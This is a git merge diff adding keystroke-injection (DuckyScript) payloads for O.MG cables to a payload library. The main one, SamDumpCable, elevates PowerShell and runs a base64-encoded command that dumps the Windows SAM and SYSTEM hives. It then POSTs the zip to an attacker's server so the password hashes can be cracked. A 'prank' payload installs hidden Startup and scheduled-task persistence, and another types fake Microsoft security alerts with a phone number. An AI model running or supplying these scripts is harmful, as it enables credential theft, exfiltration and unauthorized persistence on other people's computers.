Merge branch 'hak5:master' into master

payloads/library/credentials/SamDumpCable/README.md

@@ -0,0 +1,23 @@
+**Title: SamDumpCable**
+
+<p>Author: 0iphor13<br>
+OS: Windows<br>
+Version: 1.0<br>
+Requirements: OMG Firmware v.2.5 or higher</p>
+
+**What is SamDumpCable?**
+#
+<p>SamDumpCable dumps the users sam and system hive and compress them into a zip file.<br>
+Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
+
+
+**Instruction:**
+<p>!!!Insert the IP or URL of your recieving server!!!<br>
+1. Make sure your web server is running
+
+2. Plug in your cable and wait a few seconds
+
+3. Use a tool like samdump2 on your machine to extract the users hashes.
+	> `samdump2 1337OMGsys 1337OMGsam`
+
+![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)

payloads/library/credentials/SamDumpCable/payload.txt

@@ -0,0 +1,33 @@
+REM Title:         SamDumpCable
+REM Description:   Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
+REM Author:        0iphor13
+REM Version:       1.0
+REM Category:      Credentials
+REM Requirements: OMG Firmware v.2.5 or higher
+
+DELAY 1000
+DUCKY_LANG de
+DELAY 500
+
+DELAY 1500
+GUI r
+DELAY 500
+STRING powershell Start-Process powershell -Verb runAs
+DELAY 500
+ENTER
+DELAY 1000
+
+REM Change this Change this shortcut depending on the systems language (engl.: ALT y)
+ALT j
+DELAY 250
+
+STRING powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQAzADMANwBPAE0ARwBzAGEAbQA7AHIAZQBnACAAcwBhAHYAZQAgAGgAawBsAG0AXABzAHkAcwB0AGUAbQAgADEAMwAzADcATwBNAEcAcwB5AHMAOwBDAG8AbQBwAHIAZQBzAHMALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAFAAVwBEAFwAMQAzADMANwBPAE0ARwBzAHkAcwAiACwAIAAiACQAUABXAEQAXAAxADMAMwA3AE8ATQBHAHMAYQBtACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAATwBNAEcAZAB1AG0AcAAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAMQAzADMANwBPAE0ARwBzAHkAcwA7AHIAZQBtAG8AdgBlAC0AaQB0AGUAbQAgADEAMwAzADcATwBNAEcAcwBhAG0AOwBlAHgAaQB0AA==
+DELAY 200
+ENTER
+DELAY 200
+
+REM Insert your recieving servers IP here ----------------------------------------------------------
+STRING iwr "http://0.0.0.0" -Method POST -InFile OMGdump.zip;Remove-Item OMGdump.zip;exit
+DELAY 200
+ENTER
+

payloads/library/prank/BlueScreenOfDeath/payload.txt

@@ -1,8 +1,9 @@
-REM Title: BlueScreenOfDeath
+REM Title: Blue_Screen_Of_Death
 REM Author: LulzAnarchyAnon
 REM Description: A web browser downloads a blue screen of death image. Then saves it to the 
-REM downloads folder as an ms paint image where it is then set as the desktop wallpaper. All desktop icons are hidden.
-REM Target: Windows 10 (Powershell)
+REM downloads folder where it is set as the desktop wallpaper. All desktop icons and, the
+REM taskbar are hidden.
+REM Target: Windows 10
 Props: Darren Kitchen, and cribb-it 
 REM Version: 1.0
 REM Category: Prank
@@ -52,5 +53,23 @@ ENTER
 DELAY 1000
 ENTER
 DELAY 2000
+STRING taskbar settings
+DELAY 1000
+GUI r 
+DELAY 1000
+STRING ms-settings:taskbar
+DEALY 2000
+ENTER
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+SPACE
+DELAY 500
+GUI d
+DELAY 500
 STRING exit
 ENTER

payloads/library/prank/O.MG_Rickroll/payload.txt

@@ -0,0 +1,238 @@
+REM Modified Rick Roll from Thomas McNeela for O.MG Cables/Plug by OMG Tech
+REM GitHub: https://github.com/OMG-Tech/DuckyScript-Payloads
+REM YouTube: https://www.youtube.com/channel/UCmIE7_NdD8KnVUibayAix0w
+DELAY 8000
+GUI r
+DELAY 200
+STRING cmd
+ENTER
+DELAY 200
+REM create a folder to hold payloads
+STRING mkdir "%USERPROFILE%\Music\tmp"
+ENTER
+REM write a download script
+STRING cd %tmp% && copy con dlrick.vbs
+ENTER
+REM get user home directory
+ENTER
+STRING Dim oShell: Set oShell = CreateObject("WScript.Shell")
+ENTER
+STRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
+ENTER
+REM initialize HTTP objects
+ENTER
+STRING Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
+ENTER
+STRING Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
+ENTER
+REM open mp3 stream
+STRING xHttp.Open "GET", "https://qoret.com/dl/uploads/2019/07/Rick_Astley_-_Never_Gonna_Give_You_Up_Qoret.com.mp3", False
+ENTER
+STRING xHttp.Send
+ENTER
+REM download and write to file
+STRING With bStrm
+ENTER
+STRING .type = 1
+ENTER
+STRING .open
+ENTER
+STRING .write xHttp.responseBody
+ENTER
+STRING .saveToFile PRFL + "\Music\tmp\rick.mp3", 2
+ENTER
+STRING End With
+ENTER
+DELAY 100
+CTRL Z
+ENTER
+STRING copy con dlnir.vbs
+ENTER
+REM get user home directory
+ENTER
+STRING Dim oShell: Set oShell = CreateObject("WScript.Shell")
+ENTER
+STRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
+ENTER
+REM initialize HTTP objects
+ENTER
+STRING Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
+ENTER
+STRING Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
+ENTER
+REM open mp3 stream
+STRING xHttp.Open "GET", "http://www.nirsoft.net/utils/nircmd-x64.zip", False
+ENTER
+STRING xHttp.Send
+ENTER
+REM download and write to file
+STRING With bStrm
+ENTER
+STRING .type = 1
+ENTER
+STRING .open
+ENTER
+STRING .write xHttp.responseBody
+ENTER
+STRING .saveToFile PRFL + "\Music\tmp\nircmd-x64.zip", 2
+ENTER
+STRING End With
+ENTER
+DELAY 100
+CTRL Z
+ENTER
+REM download mp3 and nircmd
+STRING wscript dlnir.vbs && wscript dlrick.vbs
+ENTER
+DELAY 7000
+REM extract nircmd
+STRING powershell.exe -nologo -noprofile -command "& { Add-Type -A 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('%USERPROFILE%\Music\tmp\nircmd-x64.zip', '%USERPROFILE%\Music\tmp'); }"
+ENTER
+DELAY 750
+REM write volume up the payload
+STRING copy con volup.bat
+ENTER
+STRING :loop
+ENTER
+STRING %USERPROFILE%\Music\tmp\nircmd.exe mutesysvolume 0
+ENTER
+STRING %USERPROFILE%\Music\tmp\nircmd.exe setsysvolume 65535
+ENTER
+STRING timeout /t 5
+ENTER
+STRING goto loop
+ENTER
+DELAY 100
+CTRL z
+ENTER
+STRING move volup.bat %USERPROFILE%\Music\tmp\volup.bat
+ENTER
+REM hide payload folder
+STRING copy con hidefiles.vbs
+ENTER
+STRING Dim oShell: Set oShell = CreateObject("WScript.Shell")
+ENTER
+STRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
+ENTER
+STRING Dim oFSo: Set oFSo = CreateObject("Scripting.FileSystemObject")
+ENTER
+STRING Dim tmpDir: Set tmpDir = oFSo.GetFolder(PRFL + "\Music\tmp")
+ENTER
+STRING tmpDir.attributes = tmpDir.attributes + 2
+ENTER
+DELAY 100
+CTRL z
+ENTER
+STRING wscript hidefiles.vbs
+ENTER
+REM write WMP payload
+STRING copy con rickyou.vbs
+ENTER
+REM get user profile directory
+STRING Dim oShell: Set oShell = CreateObject("WScript.Shell")
+ENTER
+STRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
+ENTER
+REM start playing on loop
+STRING While true
+ENTER
+STRING Dim oPlayer: Set oPlayer = CreateObject("WMPlayer.OCX")
+ENTER
+STRING oPlayer.URL = PRFL + "\Music\tmp\rick.mp3"
+ENTER
+STRING oPlayer.controls.play
+ENTER
+STRING While oPlayer.playState <> 1 ' 1 = Stopped
+ENTER
+STRING WScript.Sleep 100
+ENTER
+STRING Wend
+ENTER
+STRING oPlayer.close
+ENTER
+STRING Wend
+ENTER
+DELAY 100
+CTRL z
+ENTER
+REM write vbs payload to hide cmd window for volup.bat
+STRING copy con volup.vbs
+ENTER
+STRING CreateObject("WScript.Shell").Run "%USERPROFILE%\Music\tmp\volup.bat", 0, False
+ENTER
+DELAY 100
+CTRL z
+ENTER
+REM move payloads to the startup directory
+STRING copy rickyou.vbs "%USERPROFILE%\Music\tmp\rickyou.vbs"
+ENTER
+STRING move rickyou.vbs "%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rickyou.vbs"
+ENTER
+STRING copy volup.vbs "%USERPROFILE%\Music\tmp\volup.vbs"
+ENTER
+STRING move volup.vbs "%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\volup.vbs"
+ENTER
+REM cleanup
+STRING del dlrick.vbs
+ENTER
+STRING del dlnir.vbs
+ENTER
+STRING del hidefiles.vbs
+ENTER
+STRING del %USERPROFILE%\Music\tmp\NirCmd.chm
+ENTER
+STRING del %USERPROFILE%\Music\tmp\nircmdc.exe
+ENTER
+STRING del %USERPROFILE%\Music\tmp\nircmd-x64.zip
+ENTER
+STRING exit
+ENTER
+REM add to task scheduler to run after unlocking the workstation
+DELAY 250
+GUI r
+DELAY 250
+STRING taskschd.msc
+ENTER
+DELAY 2000
+ALT a
+STRING b
+DELAY 1000
+STRING rr
+ENTER
+UP
+ENTER
+STRING s
+TAB
+TAB
+STRING 4801
+ENTER
+ENTER
+STRING wscript
+TAB
+TAB
+STRING %USERPROFILE%\Music\tmp\rickyou.vbs
+ENTER
+ENTER
+DELAY 500
+ALT a
+STRING b
+DELAY 1000
+STRING vu
+ENTER
+UP
+ENTER
+STRING s
+TAB
+TAB
+STRING 4801
+ENTER
+ENTER
+STRING wscript
+TAB
+TAB
+STRING %USERPROFILE%\Music\tmp\volup.vbs
+ENTER
+ENTER
+DELAY 500
+ALT f
+STRING x

payloads/library/prank/QuacKed_Again/QuacKed_Again

@@ -0,0 +1,43 @@
+REM Title: QuacKed_Again
+REM Author: LulzAnarchyAnon
+REM Description: A Quack of a different flavor. This time a browser shortcut is created
+REM on the targets Desktop, and named mycloudbackup to peak the targets curiosity.
+REM It opens a browser image of my favorite Ducky, titled " The Face You Make.
+REM When You Get Quacked" A BIT OF SELF-QUACKING just for FUN!
+REM Target: Windows 10
+REM Props: Darren Kitchen and Hak5
+REM Version: 1.0
+REM Category: Prank
+
+DELAY 100
+MOUSE CLICK 2
+DELAY 100
+DOWNARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+ENTER
+DELAY 100
+DOWNARROW
+DELAY 100
+ENTER
+DELAY 100
+STRING https://memegenerator.net/img/instances/81735469/the-face-you-make-when-you-get-quacked.jpg
+DELAY 100
+ENTER
+DELAY 100
+STRING mycloudbackup
+DELAY 100
+ENTER

payloads/library/prank/WindowS_PoP_uP/payload.txt

@@ -0,0 +1,68 @@
+REM Title: WindowS_PoP_uP
+REM Author: LulzAnarchyAnon
+REM Description: Old School fun meets modern day with this payload. 
+REM Description: So for starters notepad is opened, and a few choice words are typed out ;)
+REM Afterwards the notepad file is saved as an Error.bat to the Desktop, and notepad closes.
+REM The hapless victim notices the new addition to the desktop, and begins to click away having
+REM no idea it's just a prank, As they sweat their way with hesitation through each mouse click.
+REM Only To See.... THIS IS ONLY A PRANK! at the END! As the last ok is clicked the pop up 
+REM closes FOREVER! Leaving the victim unsure of what just happened.... :)
+REM Target: Windows 10  
+REM Props: Darren Kitchen and I am Jakoby
+REM Version: 1.0
+REM Category: Prank
+
+
+GUI r
+DELAY 20
+STRING notepad 
+ENTER
+DELAY 100
+STRING @echo off
+STRING msg * ***COMPUTER HEALTH ALERT***
+DELAY 50
+ENTER
+STRING msg * Microsoft Security Error
+DELAY 50
+ENTER
+STRING msg * Due to suspicious activity on your computer
+DELAY 50
+ENTER
+STRING msg * Please contact a Microsoft Certified Technician
+DELAY 50
+ENTER
+STRING msg * +1877-600-4257 (Toll Free)
+DELAY 50
+ENTER
+STRING msg * Please wait ...........
+DELAY 50
+ENTER
+STRING msg * Please wait ...........
+DELAY 50
+ENTER
+STRING msg * Please wait ...........
+DELAY 50
+ENTER
+STRING msg * Please wait ...........
+DELAY 50
+ENTER
+STRING msg * THIS IS ONLY A PRANK!
+DELAY 50
+CTRL s
+DELAY 100
+STRING Microsoft Error.bat
+DELAY 200
+ALT d
+DELAY 200
+SHIFT 
+DELAY 200
+SPACE
+DELAY 200
+STRING Desktop
+DELAY 200
+ENTER
+DELAY 200
+ALT s
+DELAY 800
+ALT f
+SHIFT x